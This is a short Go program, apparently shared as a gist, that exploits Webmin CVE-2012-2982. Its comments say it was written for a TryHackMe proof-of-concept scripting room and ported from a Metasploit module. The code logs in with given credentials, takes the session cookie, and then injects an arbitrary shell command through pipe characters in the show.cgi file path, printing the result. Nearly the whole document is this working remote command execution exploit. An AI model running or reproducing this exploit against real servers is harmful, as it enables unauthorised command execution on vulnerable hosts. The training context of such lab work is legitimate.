An exploit for WebMin CVE 2012-2982, in Go

webmin-cve-2012-2982.go

// built as part https://tryhackme.com/room/intropocscripting
// i used go instead of python - so this is a good resource for quick http requests with go
// reverse engineered from https://www.exploit-db.com/exploits/21851 (ruby metasploit module)

package main

import (
	"fmt"
	"io/ioutil"
	"log"
	"net/http"
	"net/url"
	"os"
	"strings"
)

func main() {

	if len(os.Args) < 5 {
		log.Fatal("args: <url to webmin> <username> <password> <cmd>")
	}

	webminUrl := os.Args[1]
	username := os.Args[2]
	password := os.Args[3]
	command := os.Args[4]

	client := &http.Client{}
	proxyUrl, _ := url.Parse("http://127.0.0.1:8080")
	client.Transport = &http.Transport{Proxy: http.ProxyURL(proxyUrl)}
	client.CheckRedirect = func(req *http.Request, via []*http.Request) error {
		return http.ErrUseLastResponse
	}

	data := "page=%2F&user=" + username + "&pass=" + password
	req, _ := http.NewRequest(http.MethodPost, webminUrl+"/session_login.cgi", strings.NewReader(data))
	req.Header.Add("Content-Type", "application/x-www-form-urlencoded")
	req.Header.Add("Cookie", "testing=1")

	resp, _ := client.Do(req)
	sid := resp.Header["Set-Cookie"][0][4:36]

	// 12345 is chosen arbitarily - doesnt seem to need to be random
	url := fmt.Sprintf("%s/file/show.cgi/bin/%s|%s|", webminUrl, "12345", command)
	req, _ = http.NewRequest(http.MethodGet, url, nil)
	req.Header.Add("Cookie", "testing=1; sid="+sid)

	resp, _ = client.Do(req)
	body, _ := ioutil.ReadAll(resp.Body)
	fmt.Println(string(body))
}